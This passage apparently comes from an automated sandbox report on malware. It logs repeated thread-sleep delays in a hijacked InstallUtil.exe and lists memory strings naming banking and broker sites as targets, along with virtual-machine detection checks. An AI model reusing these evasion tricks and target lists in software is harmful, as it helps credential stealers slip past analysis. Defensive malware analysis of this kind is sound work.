                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -599842s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5340Thread sleep count: 5352 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -599731s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -599610s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -599485s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -599360s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -599235s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -599110s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -598984s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -598875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -598766s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -598656s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -598546s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -598437s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -598328s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -598219s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -598109s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -598000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -597891s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -597781s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -597672s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -597562s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -597453s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -597334s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -597132s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -596932s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -596755s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -596617s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -596500s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -596391s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -596281s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -596172s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -596060s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -595938s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -595813s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -595701s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -595578s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -595469s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -595359s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -595250s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -595141s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -595031s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -594922s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -594812s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -594683s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -594568s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -594438s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -594325s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -594203s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -594093s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -593983s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598652Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598435Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598326Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598107Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597343Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597015Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596906Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596797Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596687Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596468Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595896Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595771Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595640Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595358Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599888Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598662Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598429Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597607Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597493Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597391Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597281Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597165Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597062Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596937Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596824Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596719Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596609Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596500Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596391Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596266Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596141Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595922Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595812Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595700Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595593Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595476Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595375Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595241Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595113Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594999Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593844Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599842
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599731
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598984
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598546
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597334
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597132
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596932
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596755
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596617
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596391
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596281
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596060
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595938
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595701
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595469
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595359
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595141
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595031
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594922
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594812
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594683
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594568
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594325
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594203
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594093
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593983
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: Tojeiuai.exe, 00000006.00000002.2251979049.0000000002799000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: Tojeiuai.exe, 00000006.00000002.2251979049.0000000002799000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                    Source: InstallUtil.exe, 00000007.00000002.4491737146.0000000000EB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
